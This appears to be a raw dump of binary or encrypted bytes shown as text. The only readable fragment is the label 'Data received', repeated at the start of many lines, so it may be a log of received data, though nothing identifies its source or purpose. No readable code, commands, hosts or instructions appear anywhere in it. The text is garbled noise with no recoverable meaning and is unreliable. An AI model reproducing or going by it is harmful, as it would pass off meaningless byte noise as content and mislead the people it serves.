Têu¡8H!ZËhCØÝóZßGÑc)8´ãÒ¶ËÎØÙ»¾J4EuÓwK¨ÖòGÒÚàZoUêª":%¬.¡½1öËU¢dNÇÈÚPán0´øYªRÜÒDçÄua ¦¾?(¨~iAÑ>²Ô±¢CZÜ÷ÊdÈiþþA\âpéý ÞÂ?\|tÓk f-VôEt*Þ$`ûÏ'ÚN°äªûñM#þ/±w9¶úmôwu:7e£Ò÷Îd`gÆ)¸§ÒH0V £ ³·»q¿ê]hÝ ®¶BtQ9Än!c®ðd¢Ø3Þª.ÚO3
Data received	hM\%s½kpþ»á9(¨{UuÀýÚÚ/4 1¸Ý¿ºM<i' /]öjHLo`ÄzNÜsPÓFñê]§¥;WÇÊH]êÔò[k>ES¼ÓXtÇcb=÷É`ÙÛxMá~Ya( µ4«·ËN9ï=Äß<Q4qlëéE~qcUU¡&¶¨¯ßÀÖëyB¼há@²óx7ù\|0øè¦ðuP%©»7q4ØúðyºuÜ2é`£¾¾î×ÚSÁùÐf1UVÎÌv@8<(A¾à=j3Ö×èi [°U§ÇAÙ(oÌ6þóÿÍ+nOl;Ò@¦Ì¾ç!Ylqô(ÔuÉS¨ETW6ì,(à^ 8Ç7XÜÅÕTõ`ÍØÁ\ÇG7ªâýÈ¹¬æ±Å¢JµÝª%0iäÈÏhÎxnõsÅC-ùkÌÖ;ÜóM ¾9û]]ë¶ nLmA)ð´ùæÂþM4ÁXþ»ÏMh³5ò±5WÀ{ÒÏÎ¸=ê7- ¤ÑãY))&(;øçIcV,qö;/èGi$#<sa¢Ïä>gàÕÃ$ljr ôÚÐÌbnyýv:ùû%y¯±äÄ /m¤{Ù'7òzP\|+ÉÈ'j«Hp5zìÏ`(X¹Å; r2÷2K=J@ÒÄÀyiÅCv\C b<+[:ÂyÑ¡Ï`Ò.Ê¸b·ä4!Çãªdá¡Txì ³À viaoFüh@½hÖâto#EzÃå3#tðR'/lX¹IÇú¾·ÌÔ°QYä+G®6OêYº½0Â ÷ª¬Y´ASV¸<Öhîû}cÿ¿ ,0ú¡rÙ}%}Ä³1G<óaäSiÌÛÿÜ"§\|hê[ò 5=>É'¹¿xýÙÔ´i^ía;¢X#ò oÜT1¦bÈa¤z^¾Íp[[=Õ#¢÷TÄë` MçÒé¨o×wð)$QÐ;Zík):6ú¬ö]©Ñ16Å÷DÈÏÒÒ£¦ ÅÛ<O´_åíMü] ½LÔýªUÚöj\(èÓÃM+ºßré®©0ê¤4blõÝ/k/fT"ûïµ·>9÷cwçPº QÓXÂ&¯zCÇHp¯Û#õµêNLµöÅï{m¿dÂöù,´áÊRUa¦<i~rªRð¡7¹Ñ°÷ã°ÇÇÜÔgV/ÞÈå¥>¸á»À;U£ÿ¹)Câ¯QWñ,aóv^¥\?¼Ú@H`û¶÷°0VÀÛ"Iùu<hØì¼ØÚtãÉÅaÒ×]Ø¥ñÃ~w;GÃþ]k¤ý¹ÄIÿÜhdO«ö æâ¨Ë®(ÞËº4_@#Çzë×T\/ÞmÛÝ¯¸cTõæ±"Êsøg¤\é·øåª¸T Å 53p7ðè¤×âC°.Ñ9Y*¸çñìO]»Ý¯¶»öß}D -\|OªÇyäMæÂ[°@û6¦º@R®_`]ùÂTscw0CÐ×:÷z&xééKËkaU}\/ý%IÊÁ¦ÍáùqSEnNHëÒ-V R¡t\ø7´Pþ#'¤ÂG Y¶wØ]MQx}Ü.Ik¹¿ï>² °nÝKÊËaÃ
Data received	É5µëÔÂG¶à²ÿ.Göö)JÚiÑ2¦ú$×«ê×ºqnr¤]ù7júÌÌÎ¾Þð#-úê ì0mP¦\·ËN¹;fÛ\ LªWOCóMóÐ³ q0Ûq>©ÕóLnøh^bE{lÓ\|do ÀwP!ê lKS³ACÍès¿`{2@(y `4Ê6~þ_KÂÌÓ\|èð7úÓ¥ä\Ç²K¦ÀÀÍäþ ¢÷Y®¤ wÇç`<ßÙÆEz¨¤8"õ¾¿É°¥ZÖ7ÄóS~Ã\ñ¤§¨9MA]¸Q¾ÐF²\|¿!Ó"3ì«n¬®IË©é®Æ¬&>ôþ1ÞL§MI÷êßkªL¹t ð]l/N²éØù¨¥$øäL0eÀQ#>û úw]¼Áî3ØÎb.þbºÍ¡V'À¥Â?4ãelHý`¿µ^ÄÁN®b%Rë+Ý$^jl3ü.ôðÖÔ¤0==öÝ 'qOpçï§ ÊX>¯jxòáMë_xvô)\¤ªÒÙ:ð¸Û&uÛ'þXkÿnoA°hPðÚÙ¢&hg©mYÉíçf(8 4>SiÓ0p´ËOdË3ªÜÄiÁºr4eîÒ]ù×ýâNòûòõhSPD>YÞ°¹,EyI6®¤®¸j{d¹£ÚæFûø«d8æ´¸Á¶°>SrD"L}1¿NYù½Q(/ìBZ+(
Data received	®Pÿý²vØììï~þj mj!>»²ô×ënMul"ådÜ0Ö%´£Ù>6PÀÁ5³¶Õ?±& 2ÝºÅÉ]üÅS{:<_pf¦2=òø¼C+Ïª/ß<þµ©ÇØJEaÔï B¦ÀÁðÔ9 )VðnÉ ¶ûi#&êùç~uö]z AþQ`å%EZw2÷îÄF(áª o«êèf½ã©ÑBÑïÎV0s»rjÛõ¸8ÖªCT±Èk¢GéCÿ'¦ñØæZPäüzªÀázc~â=Â`ÇgóÁ®Àò.Ò=þ¥~-lßWá2(ô3bÕJ; "íD({ÈÏí5øÑÏ?{Ôò!jÁGíÑòÿNâ¦#æqå]-^ÑÄ³W%AÊÌ§Ò¥º!Åèêxq^ÈeæoF«Û1AGú¡`rJ ½>d° aqôÊ»©wsÖà#3×V¢¿Ô(ùY,?4:·iHA6Ñè©»µ£éwõóFýo¸vèDÑ#^®¶ ×,úöH (sm2e+Î}º; ?ºâØpÍÒXÙ%'a¬¬ÓPâS&zúñ´&T'ÚkèOI6> ¨p°5ÉY{;2ñðºÙk©0Á)zÀ9^rRO»ã±HÎ7]´<òG0ÌÙÛ?¢âuBv~ç=µgìBò%óÁEìòDãzÿú°÷}V8æ¡FiL 2j8hï¦çzº q,lY],KF\|>s+©6µüÄÔ¥ÑQO^qrÎ÷±¬*=H`p@R[Émk5x =M1{-â¥rmªì¢çÒæq +t÷hO¬m¹èëL{Üg8/p!Àý4ÑÏÛ¢dñRú´<ëáë7
Data received	þ#ï¤çºFiwñë8É¢<pÿþXï¼¸2ñB(íUz 3&î¶Eùò Ò°¶eø±ôeJ_Z«uxQÏ°¸¯/ûÙ~#äñ4å©/±É(Åñ®sÏ`Ü×;mGs"7>!dWÎ A!U ó´â¾¾9ªÁZìÁeÏèëòø\©îûbËse`´âðãÄA+ÂL GkÍ¬`[ÝÖÂæ=)þµNëO>¼l~S24TL\|)ÁÛíhrm'©d°Áèn)Ðr¸«ÎIÎ%Mv¥_UÀ. CÈýºðã]vrL<ùD5Á ó)ÙZ]éæÃdØé°$ÎU×³³VIÖÑ¦ÓgwuÉz0ÛhËÒ3 ::åI~ºUlèæ_ÝsôÅrxùù¨ÁÂKÊbp6[/P[ÉØ\tuF± PL÷{PH«`8NOS.ow¼uØ69[ÄÊÑ\þU¼Ømÿm8Okc/wóUWoItYø»HÍjzPÁ óes8e$mÉÓÀNëO¨¢A<«öÇ Lø·ÎMôñ¾ßS¤ðãeàoXÐzº§2Ïâ~a^4ÁËªw½&O¥ÕCP8ÜÉK -'ÙÐñåÁòå¸µªD°íÑròqO¿¦g»°æ¥3qè yÔ²ßs¸Þc7Ñ²³÷Ùo3¨cöwg%Qntà¨7Ãwßczfo¹Z¾zÌ^ÜÓÞìÑåÍqäUÈÿµº(sá×îØfÈX¤LJ L`çGÀÞ°4Ô¶ÅÏpÄ<W®Àá ÀïÃ&ÀýÎ2 ªÒÕ`h^ouï¹]ÊÉzÕàp¢¤0X«Y´Æ¤ñ]uÞ4x¦mmlõ[èÃîØKä»üë`úÄÞWåÅ Îí`Ä¤ÚF¹ ]êËS¼åBÔØÜ'å³ôq23SÿK¡{äMGw×Èé%«,ï¬xEGQgÞ¯`§oéÈ§9nÁå4èwv8º¹¢gÖädz«%3½ÝÑhª&[Eß1ÐuÚ4.pIbÜ½9£è¾È çÄ=áèAñ×9ûí=ªn%kÌDV@Å0é 8ûrhóêíÑ¶n0Hq"ùp¦9¸¢Íì¬tc3HVÝAÆ§Á\]<`XéØÍê\Y÷Ô«6^´ñ'¨ÆÃ WØ8ûËè·l\q¢àV¹EÒÊ"ú~ ËbýuFTJ¥Ö<Â^ÆZQÉËÚs0%ïùÂhAíÒ© Mî÷.z5E}ÄÚx[®áÛ³2Ï«\|Hëzv¯¾¤4¾lÍtð¯°9»v»qý!~ _« 1NýËLÉ:'øtSX8¯¿§¢ôWSæ(ö¥i³Ó®°öÏ¡¯¥²aêFÏ,nøHí;ÚOOr¦j35¶ñÊúg !mÓáöÚ,.Øj}Ýx¹î¡jËX{\Á*îª½;tk+ùÑkhîHüÚÂV¥_IÄòºÛ³àÁ¤Ú¤ÖÀÑ£ËUèÎkçz¨±5øi ÛgXÅñ¿âÞÓm `ÙØ®ÚÒ¬yñ-¾.[>@ â\|Zü¡ãm
Data received	xgì§¤sghî¯5A ðÁAQU~/ò{K!ôÛ¾°i£lDï¬í1T¹+fEöª0Qûß1§hÔô!ÅÝËÄpÁ±öÉK±v,¹øø»«^ÝÎ ï+A±¼J °¥íø(T&iâé2¡;¶9$XÏ×±g¶ÐÎF7Hïâ³1G¼k23<ûø{´Ê ¿ôm óZcøÍ¶ºÌzýæ4öÅÂ·ýx4(E=[×+fw¥~tÓ¥{æË2~¡gd°ù¿5÷W¢t"\64Ò¢XüÅå~ÀpZÜ÷¤g UK%&x×oVÚæM6¼ª;¡ÛX.¦¤b=ÊçII Àâ\|¨]Q§æ&ë!â4²÷pËz ò¹§#ÐßIÊ³Ô£÷Í;rÝÊÀ®Ößè¨<q` HS "òc+©¡åaÐê×IÃTüÞÛ©NªAf ÀªdÔÕ7ày·ÍolR]¢tËÖCôÎ+/x®¬Ò]Úóó(&¤ÈÖöÊ3[Ñ!õC\|âx³G½Äûg0½Jq»ùå×þz[ÀG>&[Yv5\|åìt%t¦Ä-¦\Ú¢ÍÅÀjO#Ê<+ÆMPÈc3UMÁÊ¤î´`nLå)©Tcädÿ}lÁQÜÙÕþxÜ'ú)Jz7èÿýh±uó¬Ê«ø%É·5(YÜÃ#ÖÎMèZÙ;îÝáb÷KT=¤RËY¶bYáj]#ð[=QGá6¤¾ñÎ
Data received	HÃ^Þ±¼BíÒ<¨¤´¦ç¶D^ð0¿´Q´Òe > ¬Aíôé±²¦(öuÞ¹ØsÐúÀþrì<úÎêÐ×â¾½ðaÓäQK¾/§Ë4«Ù½Vo\9É¿J¦°¨ WäþuJ Aº:U~ÑX¸þ¾èbD¦UbSÁYQ9ÅÛÓÓÊÕÖKKIj®#bG"vÂÚ¢.´Á0 éáï¼j¡aê7¡àé9Â1¶¦Ïì¿ÃHûx´-Ä2¾YjÓx¼bk¯CZäõPzÍ'g!Üó@ÖYÀCÏÙLµf0ËÒ¶]Ñ5T+Ó3üÒ§nSyôüY6ö>\|ÕÞ=¤Ç+àÅØ³½¥ð"_£vàéwCeâö$\|ÑrT¹ÜG¯ê%H.Lný{Ûw÷¨íh´>ª:ñK)ÉîµAHDî´Ý¡¥Ab`làêòOq\|Îúuµ3ÅÀsNYNl#rCtì"{yY(Pë%¬ËhþI8Îä01·¡§æàÝÜDöÖ!øØrì¤¦m~ \ÂÞ{5b¾ðJaèiQºvá«ÇÙ´6×ùA×¬&Áhé=ee®â"'ù$¬~®Çâ®º7Ìf¤ü {DøÛë(¦¦[s¼Äxìô.ºYFåúDÉ²éóWj«o!Lp°¶hLvÚøÖxU9¯!ë³n9ÎÖj 6c4-AQã(þ!À4Ã=+¾rÛÊ-ÔµqFïO"E7¬¿LÀæe[mbDwËXT3uÓ`U ÙÔ%ÀÊ0Ñ¤]·\|pÜ_jeÁ°Cp´d ý¥vt?\º]¦ÑJÇ[j{¢wt`ç¿@u
Data received	bó t@%ÉõN0P&89¤ë½f¼_Ù!ÚD4&#Û!<~yl±É A2ÎOë>"ÜÎcmäîÌî§%í-@-ÜÔù6t:µi_H^ÎÕ=ª® Áàsª EîËÃN\<xÉCnlÓBOSgç1Ã$G¹ï¶ùïEø)_`NÙ eòïQa ]BôÙ¨Þ«`R`Ón7úC(]µ÷z¿}çßÊ¯ädÔð[L 1N½[gí/M~bè"Ê^mý4«öO'Ò÷Ìu¹Óüº¥¶Û§(ÝÇA«;gb5åÙ¼ mµOP/_¼X®W"O%¶ÚÃåZ/b}I8èà8:ÍH'4¼Þï´zúît2Á¡-83-O&é¨ª}1í`Ä÷æ½£ 48ÀH/ÑÄzIC@b1f¨¬ðÿÃoic=ßFKF@Â'°%>]Aîtî)OØ.¶`?µB¨iºÁ[ñî÷l>Ô&m=¥ÌQ©\Jtjo 2Ì-}ÚZ¬ë>û¥ÕyVÅ6 %9û÷ßþ!¥õ©/QÕ`PL]B¿û«'¶Ù'ænÎC;òõ»].6½`Þ½Ø÷ÙX´$ÜAr7ôj¹ÀÛËZéFT)Ìý¶Ñ³7½)à&ÝÞâ/&Y¥çr½²Ðs×G¥¾µÎo¬=È@¡§N9xpK>¶¦¤;X~BÌ~§×<5¶jÐúÝ'\ª?3Iµ¸`âòh =EZÆ¡ ¾[oíEjõ«bÑó;\|¿\|î¨Øò;d(XU f¤A¤kXQ <Ø2½¬ì+Úµ4ö]\K<G\|]}Vúæ (nìÈy´%%ø eü9°ò(Õ\ê£¤Q9®¼·F ¤Q5«¿ (áð8º§ù?h'ÛZûy+¹×1¬ÀyÂy=ªãÒø9æ5YßÄÉxÚV Âèjç§M¬êû"¿Ä°V-ì\|ÜÔæ4RÇèzºÚ}7@êLÕf!£áE§æV ÕáöåAêÎ?ò!ùåU(ÿuGë Æ+PÛ\|7V&BCÉVºæi´vçðYIpõg3¬Äèæ"ÑñÈSÌÀþ¥íN±Õ[ â°ý¹æ _¹jû_khÐh»?cÞäy@¯A# ¢ÓúIá«@º?HÎÅLmftFF0.öph'Ý[Ò°áNÒfx>ÆÜ>ÄÈ»¾ìÓA5£5í±ô.hqA½V~ôeð§¡¾¹pZËÝ¬r¯RÀg¥ßXÚ÷UnøeÆÞùsg°ÂPÝêdw¹vå_ã:YÐÖÑÑ¥åvÎ¸%Á_%IÝuÛu 0Ï¸V=h1¾'sÏBkXdè¤ê5¦-\9µ'eöÊJù ©ê-öóªªy&Zæ9K·ÁSu8¸8ó,;ptI°ÝqZüzMÅ~_{è`jRÒ_W³Ìµã(ÁD®Å£gá4ºöæÉñG;-êº ²@xÛ(8¨Ò¶ W ßµ0 £&nÁ¦M,üÚqçz£äÎº°[rÊÙß¨ Õ\`/E!O´Y5¨<Üÿ]WuÍÄ2~Ïµ2£
Data received	·-¼S=³¢ýXið"éÊå"°Î¹tÚ¸O¹É²Ò©©8x®¢¾ZTR 1oêM Òw¼[¸ê\Üøé÷ýÄ3h#NZ`#£o¥1ß¹yªnDçÛkT@qäiï ñÃ[é3C` Å«çsTw[Ý¿C%v~ e£æñí%Nd·áóðEB «Æò¼©[=êã:ÚIä¸wqËêUôc»Å¨ ÏÚÃÉ\|ªÏSaâQÑÔx¬mÃi DDüªhîQýÚ3þR¨7!²tûý¹@_g`0ø£ÞGbÅ²iÊPp£g,Cö;¼ÙþAâø3HfP?Púgpå,\qñÿjØB@Û1ï7ÃIÓ.¯uê÷ktoBöá¾ûeÚWCû\|tÏÉÊ n>K<k@Ü§ækøgmJ§4ë~Ð-2©{Ôâ¶ËæíNêö½]6-ÞÜµ#Íqò<ßÖù«,YÂñÁðséËèÿ0j=`û_)^³2ôë¼ò?C´~á!¦Cødh~\û)L¿\|@A/à-ÃÌTQja ûûsùtG#ÍÁÉ¨ @;ÍtÕî{ÂIÄ¿/1N6 FÔÓNê¿º)@YG¬Ù:LWíÄÃD\\Òv£sË¾¢ü4ÌpØbÐ¸W_~¦óz mI([pËÿ(ôySâPeß®¿89É,~;ÎÛ7ÞÊý$d2M3CÇ îfòZ÷ÃõL©óX6ÎCÊÑ(n¼.^fÊé{YtZL<âíãÚÙ0Ù1×¥Âë\|ZF^
Data received	:ð9È4jèë ó¨vÌOû~x%¯Ò²]°ÃÝd¬<ôÈ>&ÀªR\Óé¿ªñÏ²1:Cy¬²z<Y÷URSTí2¥ð¢ÖJ\SBÇS¹lNÆ¤"IÐ µsníL{ÖÈÃ1¨úfÄZ}sñ¨Ê ½A5vàj ©`Ô»($ã;bà:ËGþ§=]ÕogÖt¶Sa<;Ì×»¡`a0;G`ñS¹W!Á+üòoLPàµ÷¾ íêçWùèã'4mí^×E©\|ÅÀW§ÀKÛMVü@ó2±ãY7Qd92Î¢ôÇ÷:H×wx`Öñz ÌùYyYaz.ëìr[7Ölï4ÔO®sAt"g1Ðµì2½Ý]\ëe°®W«¡UhÖFÈT,>dwdæ¢4©\|}û àeÔè í N®sÅÀDYé¾6ÁÉÒ¼G© jRs§(3½¨/¦e°¾ÖA\|=iãÀ»®±wAÙ0Þ8åkÕ°h±¾ Ûi×ÉGiî÷i#¡,µ¢1êLCPÊoÐodÐa4À)¼Pì8ë7Ãig]¤¥>vÓWr!c×, U{ãä¬^ü-° @ãU²ýFj@Ëw§´m3YòZ® nÿ/9î õãÚ\|K-è²CÉ4î±?Z«»Xª'å×äÏ4V¯Å!ði<síË:Èð6]HÔâ«¼v½jDÁñb!ª61qæI°w & ÄEcæÄ¨«Dqoà«¾MlÎ5,ÊÊvTÀAVe8XÓÕkp~INeÉd;f+ãc
Data received	d¬VÑ¤â9^ÌÚfmJTÁ9£Ø·s:©Ã·:`"Uî}Èc.áW«©Å jBartÕ-h6Ù¨5=s1+ý9ùèµE(ÜÞ3®HÁ"IB NÞ!p´iZgÙ,£³úKI¹\|/wc&ïÿ¢×ÙìÑÿ¹ú_Ru ²d^Õ,¦Î;úlÅ&TSKXlwf_ùmQ D¢[ïÿ·À4óâfÕ@ì9fg;¯:3í9â0þDÓe½ÜøèÅÒ[tñtöQwi¸¬§]×+Æñ]¹%àFdüÚ³A4n¾ yúiMxQºçT507KHÐäÁjvÌ UÔ!+¡2iQïo04'µ5nË]\| ¥xÎÓ0¢¤NV~w9ÑI¿úiÈ$DN»;î×¯úàI7}x±"¨Í^$iÌ³ÏÁº"úB`¼ØAçË OÜ =¿÷\±þÊöXHÜò.]dÀººó¡5jiOkúm-úÕÀwg%8Í÷pý \ùCB%3qÊ¹(?oÊZ.»$!Gà}Ãr ºÊ>2^JÊPgs4huO$OÛSÀ;<}>33Ï[î°v+Á¥ÝÛÚ]æÈÿ§,/aë%æ¼ ý¿N$~ »ðê~àv´L¨q¨%X«¢5èJQÕ!ÝÆå¾PÜi£¸{§j°8 ÓöTQ<§ Þ 750×qÙÎ^H©ãr{Mìty KéÈ;ÅV'þ/âl[^Þ!Ï~éð©üoBj¤ý`JÖ*qø ~ì<(+¯¸ì\°W {¹VÜ áÏcå7½ZÊzÉa\|
Data received	ÖGÙ[2É·§¡ â¶¸×ñp¯rÅwÒ±nÖ;p6/V~IN Î¸»!3}_MåÔQ_W`ø;A6$RÔ éÑ h7<°ø¯¦ßâ¯²üzÅÒ%é³bÆ'àÍ½~I#PÍKÊf s6Põq¨³e±SÒÙúImRçÁÔ B"{ì-Öéü%¤ûèIl0gÓßÞq+b»¨Vvû]½t5Ôå.Òý$2x+²ÙO)¼Ê½,äº&mY¾Kx¥9P¶þcØ¡ÑqWÈì]6\|ÜØ(.è?z=Y$²ExaÒÚÉû¿¬ ]Ì4cOØuAôUn?cø51üäêËÅî¯3À)³k%ì¹ú;lw¼é ¨\|Ýu1W¤úõ®Tû;ï9Ôs Ì÷/ U!õèÌÈCoØ¢Ûf÷½3&gß²dAAkÇVº a¢ioï7~vÞÅvüZ6x6%þêS´ gö¥ä{höÚ©g¹°6HÐ(x 2.Ó-Òo&wP¹qýË/Ã²[_¯¤&PTfÅ¦ÝK;¶3ÂsHC)s3ªr-øKj%1¶ù)ltÓåTú¦§¶÷2øÿqðûàô¡ÐúzW¥ÿZFÈò\KéwW®Aã:ªÛAiiÐ$ýõ(Q=ý¼!u¹"®B^C¢ (æõÇ"6©çëc`äxTK'sLÔ"¿Ø_zRQItÀ8ÊWþ¦G¨øÊ¹{4¦º]Ú`ÀýÀ"Cx7^_<®±rq¾«G_ªn¯Ä\|,¶ÜUòÄc2³B~ÂoFaÌo¹É;ZJà
Data received	wo.â2Ü¢ñï{ÕÄ×³¯´Çh«å 4Q2¦>+¸ ºZí/yü«Ú¶2ßG/Éx¼òÈ÷Û^úNjGjÂíã`ÅâIrâf¥êÂæ~Ó½épÂÀ¶ø~±sò¨b ;ÓùC 2ÇÎåãic âò !fqåAûª»'^¼^ß @&e¿3Ëö`§#OEÔ ÝbF:bp¢9n'ä"IYWíÇÕÃØRfÌ<µÏÐcJchmNAkÓº·vâ ^OµéâÀYà®ÜTü§ïsÙ¸%/ÜJêP³¯S Ã!=OgÇÚÑå ×@`æÞ·;J½Vn%Ä'ùj:5U]T+ DÔ~0ÉOýÛnNëmNÌñÖ\|x¼Õb?ÈUEÛ 5î}ÑðZ1ÌÇÉÝ$¼õô=ÒÔÉð·¼§trxHM4²Â}PÏ²éùÞÁOÎG©â"ºý-\üvÃ§ÜMYû;Voý$ãTS-?ÚÊËAzÆÿk\m W>Ë®Þ"²ú@ßÁ¡O«»rÄÔi²*Ó´°×¦ÄïsiÞ=Þÿ-e[ Sl3!f8¥Ìdíh¬hß·£?r¶Ya^ MØ-)oüöPÆÄ#ï rÓ«¸¶+äóÖà¢´=Jø'îc£RN=pø´KüuTö]BpYvÈ õo VÙ øv±ûxUøÖÔO¢;ºDÌ±¶£)¼; ÂÒ¼Ç¾ÊÛ¶(ÔD´PØ÷ µî3#©q6#±ìîã¦÷âªk®¤jj´´ãÉló÷îJe-H/iX]&Lµ?¹Â8¥ßÛ9{ô²jÍåØ³Âò§-³È÷B[Y7Ð8§e
Data received	Ýdî-Ò!3u[aØøtxÆË;Ã¤¢Èå.¥ðªeeÀ"gñóJèhá`MZ#Hµò«á_ ·¡Î=FêAÒújýQJæ=ìïÅyñ.uNÔýÀýkÚYÇZ^eV ©ébmÕIêeÙ·k¦3²ý½tøÆ4"ÈJÓX^vµÂd$l¡Ç¨ÝK4}ÇrS8èx~# þðéÚ4sFs&}ÓüèÈ°S4¥¹ gþ®ß{ÆñõAºN´§6ùu/TÄ^êäîòBÙ¥¿ù¾¬ý¿Øê§Å\!c¼+\|&Aà:c&æµX8/üâ;mZ)²Ç£×©OÎ=JüGKE[æCPe]Äp&½°·í¼ßÂ æ3tLüL=^yovK4Ñ»O ·1¼ÏSS]´Ð\|áº«wÀãr7"[\|_ Ç¡5+ùé8¼¥VÞlVùnjÊQq X-jàÓ+õÏÎ-ºÅà:Î;öNq¡Ëé4Ï^¥Ò§¥-j¡[SväWk8l¡at=ÁÐjo1]D^/v -ÝíTÝ$¸Ã¦Ò´æ"¿\/iáÌq6e*åyV\´kµ¢-Ö9ÎJ×duy" 1íÿ2¦4©Îpð;Î\ÏÆ,¤å{ á1ß?}Rúù Þy#àÒ_èsqm ¼ûÒfË+ä«×`/Bl 6ÅåfMä²Ý5;_õ¾Gf;r ¹ç{+¸»ß3¡é×s-UY^üãò Îýã¥òÃæbÕÓùé @¼¥Î
Data received	L¤uÌ"ïuózgd4XC!þ_"KsÂßÊ/4gÓK¿,!9{ïï$zî2¨4Ï ¦!Tþ<äw W.7gS~Abvmj¬¥l$àØO$÷û³dÿVðüñ$¤mâm"â¶Hoé_^ð_Ba¶ áK-³ÄI[tLD>~5oÒÂ@HÐÙBB?hÄWî3ÓÑ>;®-SM ¢Ø¦êÑgøðÕ³Ù0.¾¥ÎNèðÖ rMP¸@ÐôuôîS?®MÊù#×X{ð!s³2/×·ñôà!WF 6¼ráÿ7Ôñ+¾$»ú¯?cDñ)ÔSP [»£V7ÉßË+êEµF1MæËú±bWÿöq¥z4¦qé.5²ß¿b=©ðçÿ»ÉVÖ-âç)ÖnìC@ù#¨Í·ÙÌFç-1£ (~®Ü§/83OÀ=Ì©õg.Q¢{+/Ä+Ñyll¥¼ÓÔþCÏ®¹H(Á³ô½e©ÞîvCQîÁùQÚ)¥ám·M¤6iöÙß Ëfc$Pæúèg«À¶¥HUSpLìZ\;ÄxìºT=ðMÄ`?FCqX¨fü·N¶ÚKv:[Ïé]UÑ°ï·vÝ=Õ1 ÐH}3¹ÓÚK±i[=¦èüõqÏ9)C%än×AÉtÊê¡mÕMÓÄF~û~é«ÂÚÛ¯«ÞíèÆ3Âw1Ô+ 'þFyûêO{h\2&êÁ³Ï+{è³¬üs2Õ«eHN¤²yÿ-_êÿÖO¯Kàc3®0º-4ù¹.àý}è«¯ýÆ[l!µ]]øÒÙ¢âü®ßPTÖ7ñlXÜÝ£üâÐB³2Bë["+½I&ôaÄÑ·(QÃ«ôÒ/$öyØ<qõÂcX>Ô¨Õß£R?ÊR5$l±¾£uq¤ÄäùÏ³Tæn@Ï~Ð0pg%aÏ&ø[¬¼þ²ã4ZMfÈ§jDFö>¦ÜDeiPã,4bA%wn_ÈÎòñ²®:W;o.®3,Ð³´ÿçasFAÑ&,TV¸F%lÌi¡Iç)i·bÃåòþ;j±þÒ"È\ÂáOiV»Í"äÅðñY<¯µñXf ³ 3)èö®¤ý¿>6<@ÌíVLÖÓÐ#àÛp´Øu¿Íòø.³TRZ=!ÿ}2Í9GXDTö!Y=Ô!tZ×Ýð ä¿çD9ÛÆ)ÿ¥\K» Tkû?^G-rìÍÄï$É)]BZ3¸Â~ã$£ù¦-ZWa²"±äZ£Ô}Ìú×<¹A£»[ò»0¢vKm¼$ß0ä¨FLaêZ3üôÚ¼SÍ:e?Çùfÿ¼Ù<èJ`ÎËvÖùBÊ'e÷6øª`SÉCî5Ü{³WÛ{Ê+Ò¶»©²¤Mæ²"[½%Ã~²¿Ø<Cr§òûr²yV´ã_<6Á+A=]sC5@Q´fö;å©ÚLH.78ò¼«V^Ìß×¹m*s¦Ú~c¹Á¥ÕÊü¾å·L¿hï¸]õ Ày¶ùÂ
Data received	Ç£¢§lÕwÛvÙ¡8P©Õ¤;MÔÚóÃçuKÄ¢~µtp ôvì³¦µMu"y\|¿hhÊ4ÅZ"Òíó(ETuw&t7èaôËÍü¦Ø4îì!Ê½.è]T&ÝS/æè/Ø5äî?¹dÿº¯ÆF¥Wbaz©ìë9ÉñBqðóÖ1O ^YìéeÑ¶¤ÐSæ±8£ÿUq±(3ç)Þ 3Z¿.¼ ÑÉøWZEPÂ«ÁyÚõÏQ¥¯lmNJqbÂ{Öµ5¶¹¤,ñäµ¹t#z9iKD`ßá´g³°â' kzqÓZcFÈq7£Ùrö_/ïõl£ÅT¢;9¥K1Æé`Kqt:{+B·@d;Á,Ôu-)È÷nÃ¦¯ÎH-eã\"_CèÎ¤Äñ£Sn8îÇ@nÉ_ôÁb´è£Ê1Ó·Ú.®¢A^4¹ÿWÍBIVÈz)TP&íTÝW\|ê.¤DØpß»m;ßBQÜÃ«?òÇ9ZF(QQèjØKY ø3èÿxÇdy¤Yk¥;½ëjaûGóT¡ìýªjµiîQ)\|Þ«7.m0e!¡wÝBû{òBoMëiÍ/¡½Åñµ?µÚb_®¨tÍt·Åeò! MnZÒûwæ©ÄxÚµÑw)Uc×yÂüjÎ4;æ¡dW¾ýÐTné×CöVÄGü¤Lo¬.ÀNàOéoZÛh64äÿLµg²]P×ÕÁï^»¸5øú²¸cäbOå5oî\ Ý¦j,ÆKXsóCÂårðcPf#^;1ÖÜ*³RÙÿÿÝÛª=jÌQÑzÀp?ßÚýù¡ÁªÀk¸Æá:
Data received	Yfá½êhz_5ïÌ»Û^î1 ÏÐé?ª´Ð90(¨Oü%fÉ«¹·¾{"7rÿaæÖ5\|zåcô2ð?¨Þ yÖîoÙÅò¯gçÇ2½Ê Mò%®!B-côÿü¶½ÌI0:u<²SëJä0Ñf;{{Ç2ÆÚ¤ã44m&» îòò° Èø?¿ÕóU½ºXg¼« ¡ Ñ Ð>_3£±³g;ì©Ør¡ nBPÄdú¾õzn;,$ÎË¥¯¸øÙ£\ä '¯ú$@T:dÍ\¶l=KeµO^¸w°Ch'lÍ,I,ËúªÀ«ûYKîNuU× 7ÑX'Ålãz3LrVâªzS3(D¹p_sAÀIWï^Î^%)Å°IGw£ü{®CiçËô°ãädPDmeÏT®+Òq®OtÆÙ+6Ò¼AÁ?¥0ø?ß(&d½E¬ºn>_!¨»°dq:ÿ¬+E(d6Iú¡!Ã_qáp\|ÔPÍ½4oÄ ÷½5P/â~_t·g«É²è.¶õ¾ÞÖÀã Ãçzu+¶C¡Lô+Õ SRÍ¸TÎv¦òZ±ÖMù³rt[Z7Ô¯úëpým,ÐµNOÆ =å`Ö½z%+é½~DÌ¯oÔÝà-ÝÀÔé./«ãÑÉÑÉ{ ,¡©NNjX)áPëxÚwõR(ùrlÛ\|} ·(é4FSÙ[¸mÙ
